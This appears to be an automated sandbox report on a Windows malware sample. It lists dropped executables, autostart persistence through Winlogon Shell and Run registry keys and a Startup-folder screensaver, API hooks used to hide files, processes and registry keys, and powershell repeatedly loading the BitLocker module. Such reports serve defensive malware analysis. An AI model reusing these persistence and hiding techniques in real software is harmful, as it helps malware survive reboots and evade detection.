Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\NOQISejH.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI26762\python310.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\PbqyFjSG.log	Jump to dropped file
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69202\_socket.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI26762\_socket.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17002\_decimal.pyd	Jump to dropped file
Source: C:\ProgramData\setup.exe	File created: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\KVBZghxI.log	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	File created: C:\ProgramData\Microsoft\based.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	File created: C:\ProgramData\Microsoft\hacn.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	File created: C:\ProgramData\setup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	File created: C:\ProgramData\svchost.exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File created: C:\Windows\System32\SecurityHealthSystray.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\IJrrbLaQ.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\psELHGPB.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\UuxpgXjt.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\GQcIpPoS.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\NOQISejH.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\vCoCyIOs.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\THthvKov.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\qGmlrcYy.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\EcYAEBsU.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\chceADSX.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\KVBZghxI.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\iaFEdjXM.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\eeEmWDhS.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\NXnICQCE.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\CjJRSFHW.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\RKFGfNRs.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\rVVLbyhv.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\PbqyFjSG.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\HMPjFLLW.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\ovdDmGAG.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\MAhhiIaK.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\bbeWvQkg.log	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell "C:\Recovery\powershell.exe"

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wouVpTZDoyPyABKEH
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHost
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm

Source: C:\ProgramData\Microsoft\based.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr

Jump to behavior

Source: C:\ProgramData\Microsoft\based.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHost
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHost
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wouVpTZDoyPyABKEH
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wouVpTZDoyPyABKEH
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\ProgramData\setup.exe

Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\WXYUBNJMNLAE.TMP

Hooks files or directories query functions (used to hide files and directories)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Source: C:\Users\user\Desktop\VaTlw2kNGc.exe

Code function: 0_2_00007FF7691A6EA0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00007FF7691A6EA0

Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
